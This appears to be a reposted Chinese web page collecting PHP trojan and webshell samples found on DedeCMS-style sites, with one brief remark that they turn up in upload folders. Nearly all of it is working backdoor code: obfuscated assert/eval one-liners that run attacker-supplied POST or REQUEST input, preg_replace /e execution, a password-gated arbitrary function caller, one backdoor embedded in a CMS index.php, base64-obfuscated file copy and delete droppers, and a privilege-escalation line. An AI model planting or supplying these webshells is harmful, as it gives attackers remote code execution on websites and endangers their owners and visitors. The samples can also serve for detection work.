您的位置:首页 > 编程语言 > PHP开发

php木马样本,持续更新

2014-08-18 16:40 309 查看 
<?array_map("ass\x65rt",(array)$_REQUEST[dede]);?>
<?php $command=$_POST[1990]; @eval($command);?>


打着广告的名义忽悠的php木马,不少一句话木马出现在附件上传目中,以达到网站挣钱的目的,而且还不是自己的网站,可通过linux命令批量查看文件查找到。

<?array_map("ass\x65rt",(array)$_REQUEST[seay]);?>
* @version        $Id: index.php 1 9:23 2010-11-11 tianya $
* @package        DedeCMS.Site
* @copyright      Copyright (c) 2007 - 2010, DesDev, Inc.
* @license        http://help.dedecms.com/usersguide/license.html * @link           http://www.dedecms.com */
if(!file_exists(dirname(__FILE__).'/data/common.inc.php'))
{
header('Location:install/index.php');
exit();
}
if(isset($_GET['upcache']) || !file_exists('index.html'))
{
require_once (dirname(__FILE__) . "/include/common.inc.php");
require_once DEDEINC."/arc.partview.class.php";
$GLOBALS['_arclistEnv'] = 'index';
$row = $dsql->GetOne("Select * From `#@__homepageset`");
$row['templet'] = MfTemplet($row['templet']);
$pv = new PartView();
$pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']);
$row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0;
if ($row['showmod'] == 1)
{
$pv->SaveToHtml(dirname(__FILE__).'/index.html');
include(dirname(__FILE__).'/index.html');
exit();
} else {
$pv->Display();
exit();
}
}
else
{
header('HTTP/1.1 301 Moved Permanently');
header('Location:index.html');
}
?>


<?php

error_reporting(E_ERROR);

if (isset($_REQUEST['myfunctionpassw']))

define('FUNCTION_PASSW',stripslashes($_REQUEST['myfunctionpassw']));

if (isset($_REQUEST['myfunctioncodea']))

define('FUNCTION_CODEA',stripslashes($_REQUEST['myfunctioncodea']));

if (isset($_REQUEST['myfunctioncodeb']))

define('FUNCTION_CODEB',stripslashes($_REQUEST['myfunctioncodeb']));

if (isset($_REQUEST['myfunctioncodec']))

define('FUNCTION_CODEC',stripslashes($_REQUEST['myfunctioncodec']));

if (substr ( md5 (FUNCTION_PASSW),26) == '254bff') {

if (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb']) && isset($_REQUEST['myfunctioncodec']))

$_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB, FUNCTION_CODEC);

elseif (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb']))

$_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB) ? print(FUNCTION_CODEA.' ok') : print(FUNCTION_CODEA.' err');

else

$_REQUEST['myfunctionname'](FUNCTION_CODEA);

} else {

die('Access Denied');

}
?>


linux一句话提权install uprobes /bin/sh





组合木马

<?php ($_=@$_GET[2]).@$_($_POST[1])?>


<?php $k="ass"."ert"; $k(${"_PO"."ST"} [sz]);?>

<?php copy(base64_decode("Li4vLi4vLi4vcGx1cy9kb3dubG9hZC5waHA="),base64_decode("Li4vLi4vZGVkZWRvd25sb2FkLnBocA=="));copy(base64_decode("Li4vLi4vLi4vcGx1cy9teXRhZ19qcy5waHA="),base64_decode("Li4vLi4vZGVkZW15dGFnLnBocA=="));echo "dedeok823571";?>

<?php echo "dedeok";array_map("ass\x65rt",(array)${"_PO"."ST"}["52296"]);?>

<?php unlink(base64_decode("Li4vLi4vcGx1cy9kb3dubG9hZC5waHA="));unlink(base64_decode("Li4vLi4vcGx1cy9teXRhZ19qcy5waHA="));echo "dedeok913438";?>

<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['8']);?>

<?$_POST['k']($_POST['8']);?>

<?php $k = str_replace("8","","a8s88s8e8r88t");$k($_POST["8"]); ?>

<?php $_GET['k8']($_POST['k8']);?>

<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST["k8"]);  ?>

<?php @preg_replace("//e",$_POST[x],"e");exit("|LO|"); ?>

<?php echo "dedeok";array_map("ass\x65rt",(array)${"_PO"."ST"}["16883"]);?>

<?php echo "dedeok245563";$a=scandir("../../../../");print_r($a);?>

<?php@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");        ?>
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航